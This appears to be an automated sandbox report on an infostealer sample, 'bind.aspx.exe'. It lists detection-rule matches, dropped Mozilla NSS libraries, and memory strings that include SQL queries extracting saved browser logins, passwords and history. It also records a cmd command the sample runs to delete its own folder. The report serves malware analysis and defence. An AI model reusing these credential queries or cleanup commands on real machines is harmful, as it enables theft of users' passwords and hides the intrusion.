                    Source: bind.aspx.exe, 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamevcruntime140.dll^ vs bind.aspx.exe
                    Source: bind.aspx.exeBinary or memory string: OriginalFilenamefreebl3.dll0 vs bind.aspx.exe
                    Source: bind.aspx.exeBinary or memory string: OriginalFilenamemozglue.dll0 vs bind.aspx.exe
                    Source: bind.aspx.exeBinary or memory string: OriginalFilenamemsvcp140.dll^ vs bind.aspx.exe
                    Source: bind.aspx.exeBinary or memory string: OriginalFilenamenss3.dll0 vs bind.aspx.exe
                    Source: bind.aspx.exeBinary or memory string: OriginalFilenamesoftokn3.dll0 vs bind.aspx.exe
                    Source: bind.aspx.exeBinary or memory string: OriginalFilenamevcruntime140.dll^ vs bind.aspx.exe
                    Source: bind.aspx.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: bind.aspx.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                    Source: bind.aspx.exe, type: SAMPLEMatched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
                    Source: 4.2.bind.aspx.exe.340000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                    Source: 4.2.bind.aspx.exe.340000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
                    Source: 4.0.bind.aspx.exe.340000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                    Source: 4.0.bind.aspx.exe.340000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/17@2/3
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_0034EE16 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,4_2_0034EE16
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_0034F237 _EH_prolog,CoCreateInstance,SysAllocString,_wtoi64,SysFreeString,SysFreeString,4_2_0034F237
                    Source: C:\Users\user\Desktop\bind.aspx.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\76561199761128941[1].htmJump to behavior
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7988:120:WilError_03
                    Source: C:\Users\user\Desktop\bind.aspx.exeFile created: C:\Users\user~1\AppData\Local\Temp\delays.tmpJump to behavior
                    Source: bind.aspx.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\bind.aspx.exeFile read: C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1003\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: bind.aspx.exe, 00000004.00000000.1269093888.0000000000366000.00000008.00000001.01000000.00000003.sdmp, bind.aspx.exe, 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmp, softokn3.dll.4.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                    Source: bind.aspx.exe, 00000004.00000000.1269093888.0000000000366000.00000008.00000001.01000000.00000003.sdmp, bind.aspx.exe, 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmp, bind.aspx.exe, 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000001.1269863025.0000000000366000.00000008.00000001.01000000.00000003.sdmp, nss3.dll.4.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                    Source: bind.aspx.exe, 00000004.00000000.1269093888.0000000000366000.00000008.00000001.01000000.00000003.sdmp, bind.aspx.exe, 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmp, softokn3.dll.4.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                    Source: bind.aspx.exe, 00000004.00000000.1269093888.0000000000366000.00000008.00000001.01000000.00000003.sdmp, bind.aspx.exe, 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmp, bind.aspx.exe, 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000001.1269863025.0000000000366000.00000008.00000001.01000000.00000003.sdmp, nss3.dll.4.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                    Source: bind.aspx.exe, 00000004.00000002.1880614542.000000000350E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT fieldname, value FROM moz_formhistory/4;;
                    Source: bind.aspx.exe, 00000004.00000000.1269093888.0000000000366000.00000008.00000001.01000000.00000003.sdmp, bind.aspx.exe, 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmp, bind.aspx.exe, 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000001.1269863025.0000000000366000.00000008.00000001.01000000.00000003.sdmp, nss3.dll.4.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                    Source: bind.aspx.exe, 00000004.00000002.1880614542.000000000350E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT origin_url, username_value, password_value FROM loginsL7P;
                    Source: bind.aspx.exe, 00000004.00000000.1269093888.0000000000366000.00000008.00000001.01000000.00000003.sdmp, bind.aspx.exe, 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmp, bind.aspx.exe, 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000001.1269863025.0000000000366000.00000008.00000001.01000000.00000003.sdmp, nss3.dll.4.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                    Source: bind.aspx.exe, 00000004.00000000.1269093888.0000000000366000.00000008.00000001.01000000.00000003.sdmp, bind.aspx.exe, 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmp, softokn3.dll.4.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                    Source: bind.aspx.exe, 00000004.00000000.1269093888.0000000000366000.00000008.00000001.01000000.00000003.sdmp, bind.aspx.exe, 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmp, softokn3.dll.4.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                    Source: bind.aspx.exe, 00000004.00000000.1269093888.0000000000366000.00000008.00000001.01000000.00000003.sdmp, bind.aspx.exe, 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmp, softokn3.dll.4.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                    Source: bind.aspx.exe, 00000004.00000000.1269093888.0000000000366000.00000008.00000001.01000000.00000003.sdmp, bind.aspx.exe, 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmp, softokn3.dll.4.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                    Source: bind.aspx.exe, 00000004.00000000.1269093888.0000000000366000.00000008.00000001.01000000.00000003.sdmp, bind.aspx.exe, 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmp, softokn3.dll.4.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                    Source: bind.aspx.exe, 00000004.00000000.1269093888.0000000000366000.00000008.00000001.01000000.00000003.sdmp, bind.aspx.exe, 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmp, bind.aspx.exe, 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000001.1269863025.0000000000366000.00000008.00000001.01000000.00000003.sdmp, nss3.dll.4.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                    Source: bind.aspx.exe, 00000004.00000000.1269093888.0000000000366000.00000008.00000001.01000000.00000003.sdmp, bind.aspx.exe, 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmp, bind.aspx.exe, 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000001.1269863025.0000000000366000.00000008.00000001.01000000.00000003.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
                    Source: bind.aspx.exe, 00000004.00000000.1269093888.0000000000366000.00000008.00000001.01000000.00000003.sdmp, bind.aspx.exe, 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmp, bind.aspx.exe, 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000001.1269863025.0000000000366000.00000008.00000001.01000000.00000003.sdmp, nss3.dll.4.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                    Source: bind.aspx.exe, 00000004.00000000.1269093888.0000000000366000.00000008.00000001.01000000.00000003.sdmp, bind.aspx.exe, 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmp, softokn3.dll.4.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                    Source: bind.aspx.exe, 00000004.00000002.1880614542.000000000350E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT url FROM urls LIMIT 1000S6);
                    Source: bind.aspx.exe, 00000004.00000003.1728292054.0000000024E86000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1740947331.0000000024E7A000.00000004.00000020.00020000.00000000.sdmp, DGDBAK.4.dr, CGHCGI.4.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: bind.aspx.exe, 00000004.00000000.1269093888.0000000000366000.00000008.00000001.01000000.00000003.sdmp, bind.aspx.exe, 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmp, bind.aspx.exe, 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000001.1269863025.0000000000366000.00000008.00000001.01000000.00000003.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                    Source: bind.aspx.exe, 00000004.00000000.1269093888.0000000000366000.00000008.00000001.01000000.00000003.sdmp, bind.aspx.exe, 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmp, softokn3.dll.4.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                    Source: bind.aspx.exe, 00000004.00000000.1269093888.0000000000366000.00000008.00000001.01000000.00000003.sdmp, bind.aspx.exe, 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmp, bind.aspx.exe, 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000001.1269863025.0000000000366000.00000008.00000001.01000000.00000003.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                    Source: bind.aspx.exe, 00000004.00000000.1269093888.0000000000366000.00000008.00000001.01000000.00000003.sdmp, bind.aspx.exe, 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmp, softokn3.dll.4.drBinary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                    Source: bind.aspx.exeReversingLabs: Detection: 42%
                    Source: unknownProcess created: C:\Users\user\Desktop\bind.aspx.exe "C:\Users\user\Desktop\bind.aspx.exe"
                    Source: C:\Users\user\Desktop\bind.aspx.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\GCAEHDBAAECB" & exit
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                    Source: C:\Users\user\Desktop\bind.aspx.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\GCAEHDBAAECB" & exitJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10Jump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeSection loaded: rstrtmgr.dllJump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeSection loaded: dbghelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeSection loaded: ntshrui.dllJump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeSection loaded: linkinfo.dllJump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeSection loaded: pcacli.dllJump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                    Source: bind.aspx.exeStatic file information: File size 5424128 > 1048576
                    Source: bind.aspx.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x500a00
                    Source: Binary string: freebl3.pdb source: bind.aspx.exe, freebl3.dll.4.dr
                    Source: Binary string: mozglue.pdbP source: bind.aspx.exe, mozglue.dll.4.dr
                    Source: Binary string: freebl3.pdbp source: bind.aspx.exe, freebl3.dll.4.dr
                    Source: Binary string: nss3.pdb@ source: bind.aspx.exe, nss3.dll.4.dr
                    Source: Binary string: softokn3.pdb@ source: bind.aspx.exe, softokn3.dll.4.dr
                    Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: bind.aspx.exe, vcruntime140.dll.4.dr
                    Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: bind.aspx.exe, msvcp140.dll.4.dr
                    Source: Binary string: nss3.pdb source: bind.aspx.exe, nss3.dll.4.dr
                    Source: Binary string: mozglue.pdb source: bind.aspx.exe, mozglue.dll.4.dr
                    Source: Binary string: softokn3.pdb source: bind.aspx.exe, softokn3.dll.4.dr
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_0035549F EntryPoint,LoadLibraryA,GetProcAddress,GetProcAddress,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,GetProcAddress,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,GetProcAddress,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,OpenEventA,CloseHandle,OpenEventA,CreateEventA,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,CloseHandle,ExitProcess,4_2_0035549F
                    Source: nss3.dll.4.drStatic PE information: section name: .00cfg
                    Source: freebl3.dll.4.drStatic PE information: section name: .00cfg
                    Source: mozglue.dll.4.drStatic PE information: section name: .00cfg
                    Source: msvcp140.dll.4.drStatic PE information: section name: .didat
                    Source: softokn3.dll.4.drStatic PE information: section name: .00cfg
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_0035A785 push ecx; ret 4_2_0035A798
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_61EDC329 pushfd ; retf 0004h4_2_61EDC32A
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_61EDA2A8 push ds; retf 4_2_61EDA2AE
                    Source: C:\Users\user\Desktop\bind.aspx.exeFile created: C:\ProgramData\GCAEHDBAAECB\vcruntime140.dllJump to dropped file
                    Source: C:\Users\user\Desktop\bind.aspx.exeFile created: C:\ProgramData\GCAEHDBAAECB\freebl3.dllJump to dropped file
                    Source: C:\Users\user\Desktop\bind.aspx.exeFile created: C:\ProgramData\GCAEHDBAAECB\softokn3.dllJump to dropped file
                    Source: C:\Users\user\Desktop\bind.aspx.exeFile created: C:\ProgramData\GCAEHDBAAECB\msvcp140.dllJump to dropped file
                    Source: C:\Users\user\Desktop\bind.aspx.exeFile created: C:\ProgramData\GCAEHDBAAECB\nss3.dllJump to dropped file
                    Source: C:\Users\user\Desktop\bind.aspx.exeFile created: C:\ProgramData\GCAEHDBAAECB\mozglue.dllJump to dropped file
                    Source: C:\Users\user\Desktop\bind.aspx.exeFile created: C:\ProgramData\GCAEHDBAAECB\vcruntime140.dllJump to dropped file
                    Source: C:\Users\user\Desktop\bind.aspx.exeFile created: C:\ProgramData\GCAEHDBAAECB\freebl3.dllJump to dropped file
                    Source: C:\Users\user\Desktop\bind.aspx.exeFile created: C:\ProgramData\GCAEHDBAAECB\softokn3.dllJump to dropped file
                    Source: C:\Users\user\Desktop\bind.aspx.exeFile created: C:\ProgramData\GCAEHDBAAECB\msvcp140.dllJump to dropped file
                    Source: C:\Users\user\Desktop\bind.aspx.exeFile created: C:\ProgramData\GCAEHDBAAECB\nss3.dllJump to dropped file
                    Source: C:\Users\user\Desktop\bind.aspx.exeFile created: C:\ProgramData\GCAEHDBAAECB\mozglue.dllJump to dropped file
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_00355EDC GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_00355EDC
                    Source: C:\Users\user\Desktop\bind.aspx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeDropped PE file which has not been started: C:\ProgramData\GCAEHDBAAECB\freebl3.dllJump to dropped file
                    Source: C:\Users\user\Desktop\bind.aspx.exeDropped PE file which has not been started: C:\ProgramData\GCAEHDBAAECB\vcruntime140.dllJump to dropped file
                    Source: C:\Users\user\Desktop\bind.aspx.exeDropped PE file which has not been started: C:\ProgramData\GCAEHDBAAECB\softokn3.dllJump to dropped file
                    Source: C:\Users\user\Desktop\bind.aspx.exeDropped PE file which has not been started: C:\ProgramData\GCAEHDBAAECB\msvcp140.dllJump to dropped file
                    Source: C:\Users\user\Desktop\bind.aspx.exeDropped PE file which has not been started: C:\ProgramData\GCAEHDBAAECB\nss3.dllJump to dropped file
                    Source: C:\Users\user\Desktop\bind.aspx.exeDropped PE file which has not been started: C:\ProgramData\GCAEHDBAAECB\mozglue.dllJump to dropped file
                    Source: C:\Windows\SysWOW64\timeout.exe TID: 8036Thread sleep count: 79 > 30Jump to behavior
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\bind.aspx.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_0034AAF6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_0034AAF6
                    Source: C:\Users\user\Desktop\bind.aspx.exeCode function: 4_2_003538DD wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,4_2_003538DD
